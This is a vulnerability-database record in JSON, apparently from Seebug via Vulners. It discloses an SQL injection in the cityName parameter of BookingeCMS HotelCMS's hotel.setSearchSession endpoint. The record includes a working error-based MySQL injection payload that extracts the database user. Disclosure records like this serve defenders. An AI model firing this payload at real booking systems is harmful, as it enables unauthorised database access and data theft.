DATABASE RESOURCES PRICING ABOUT US

{"type": "seebug", "viewCount": 7, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "reporter": "Root", "title": "BookingeCMS HotelCMS\u9152\u5e97\u9884\u8ba2\u7ba1\u7406\u7cfb\u7edfcityName\u53c2\u6570\u5b58\u5728\u6ce8\u5165", "cvelist": [], "bulletinFamily": "exploit", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2015-12-07T00:00:00", "description": "### 0x01 \u6f0f\u6d1e\u7b80\u8ff0\r\n\u63d0\u4ea4\u65f6\u95f4\uff1a\t 2015-09-04 13:33\r\n\r\n\u516c\u5f00\u65f6\u95f4\uff1a\t 2015-12-06 09:00\r\n\r\n\u6f0f\u6d1e\u7c7b\u578b\uff1a\t SQL\u6ce8\u5c04\u6f0f\u6d1e\r\n\r\n\u73e0\u6d77\u4e2d\u65b0\u4fe1\u606f\u79d1\u6280\u6709\u9650\u516c\u53f8\u5f00\u53d1\u7684BookingeCMS HotelCMS /?m=hotel.setSearchSession \u6587\u4ef6cityName\u53c2\u6570\u5b58\u5728\u6ce8\u5165\r\n\r\n### 0x02 \u6f0f\u6d1e\u5229\u7528\r\n\r\n\r\n\u6d4b\u8bd5Payload: \uff08post\u63d0\u4ea4\uff09\r\n\r\n/?m=hotel.setSearchSession \r\n\r\n```\r\ncityName=&type=getCityId&cityName=%E7%A6%8F%E5%B7%9E%' AND (SELECT 4965 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&indate=2015-08-27&outdate=2015-08-30&address=&hotelName=1\r\n```\r\n\r\n\r\n\r\n### 0x03 \u53c2\u8003\u94fe\u63a5\r\nhttp://www.wooyun.org/bugs/wooyun-2010-0137378", "href": "https://www.seebug.org/vuldb/ssvid-90010", "id": "SSV:90010", "status": "poc,details", "lastseen": "2017-11-19T12:23:24", "sourceData": "", "published": "2015-12-07T00:00:00", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645396344, "score": 1659783552, "epss": 1678848988}}

{}